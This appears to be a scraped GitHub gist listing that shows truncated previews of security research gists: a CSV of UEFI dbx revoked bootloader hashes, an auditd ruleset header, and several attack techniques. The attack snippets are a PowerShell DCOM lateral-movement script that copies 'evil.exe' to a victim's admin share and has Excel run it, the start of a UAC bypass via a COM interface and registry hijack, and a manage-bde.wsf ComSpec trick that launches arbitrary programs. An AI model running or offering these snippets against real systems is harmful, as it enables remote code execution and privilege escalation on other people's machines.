coh7eiqu8thaBu coh7eiqu8thaBu
mattifestation
/ dbxhashoutput.csv
Created
September 3, 2017 17:49
A basic "dbx" UEFI variable parser to dump blacklisted UEFI bootloader hashes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| SignatureOwner | SHA256Hash | |
|---|---|---|
| 00000000-0000-0000-0000-000000000000 | 6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D | |
| 77fa9abd-0359-4d32-bd60-28f4e78f784b | 80B4D96931BF0D02FD91A61E19D14F1DA452E66DB2408CA8604D411F92659F0A | |
| 77fa9abd-0359-4d32-bd60-28f4e78f784b | F52F83A3FA9CFBD6920F722824DBE4034534D25B8507246B3B957DAC6E1BCE7A | |
| 77fa9abd-0359-4d32-bd60-28f4e78f784b | C5D9D8A186E2C82D09AFAA2A6F7F2E73870D3E64F72C4E08EF67796A840F0FBD | |
| 77fa9abd-0359-4d32-bd60-28f4e78f784b | 363384D14D1F2E0B7815626484C459AD57A318EF4396266048D058C5A19BBF76 | |
| 77fa9abd-0359-4d32-bd60-28f4e78f784b | 1AEC84B84B6C65A51220A9BE7181965230210D62D6D33C48999C6B295A2B0A06 | |
| 77fa9abd-0359-4d32-bd60-28f4e78f784b | E6CA68E94146629AF03F69C2F86E6BEF62F930B37C6FBCC878B78DF98C0334E5 | |
| 77fa9abd-0359-4d32-bd60-28f4e78f784b | C3A99A460DA464A057C3586D83CEF5F4AE08B7103979ED8932742DF0ED530C66 | |
| 77fa9abd-0359-4d32-bd60-28f4e78f784b | 58FB941AEF95A25943B3FB5F2510A0DF3FE44C58C95E0AB80487297568AB9771 |
rxwx
/ foxprow.ps1
Last active
September 14, 2017 15:06
DCOM binary planting via Excel.Application.ActivateMicrosoftApp
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "192.168.1.111")) | |
| # Windows 10 specific, but searches PATH so .. | |
| copy C:\payloads\evil.exe \\victimip\c$\Users\bob\AppData\Local\Microsoft\WindowsApps\FOXPROW.EXE | |
| $excel.ActivateMicrosoftApp("5") | |
| # excel executes your binary :) |
hfiref0x
/ akagi_42b.c
Last active
August 21, 2025 16:06
UAC bypass using FwCplLua COM interface and HKCU mscfile registry entry hijack
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| typedef interface IFwCplLua IFwCplLua; | |
| typedef struct IFwCplLuaInterfaceVtbl { | |
| BEGIN_INTERFACE | |
| HRESULT(STDMETHODCALLTYPE *QueryInterface)( | |
| __RPC__in IFwCplLua * This, | |
| __RPC__in REFIID riid, | |
| _COM_Outptr_ void **ppvObject); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # IMPORTANT! | |
| # This gist has been transformed into a github repo | |
| # You can find the most recent version there: | |
| # https://github.com/Neo23x0/auditd | |
| # ___ ___ __ __ | |
| # / | __ ______/ (_) /_____/ / | |
| # / /| |/ / / / __ / / __/ __ / | |
| # / ___ / /_/ / /_/ / / /_/ /_/ / | |
| # /_/ |_\__,_/\__,_/_/\__/\__,_/ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| I came across an interesting Windows Script File (WSF) that has been around a while called 'manage-bde.wsf'. It may be located in SYSTEM32. | |
| Though not nearly as cool as SyncAppvPublishingServer[.com/.vbs], we can 'tamper' with manage-bde.wsf to run things in unattended ways. | |
| Here are a few examples that you may or may not find useful - | |
| 1) Replace ComSpec Variable | |
| set comspec=c:\windows\system32\calc.exe | |
| cscript manage-bde.wsf |
OlderNewer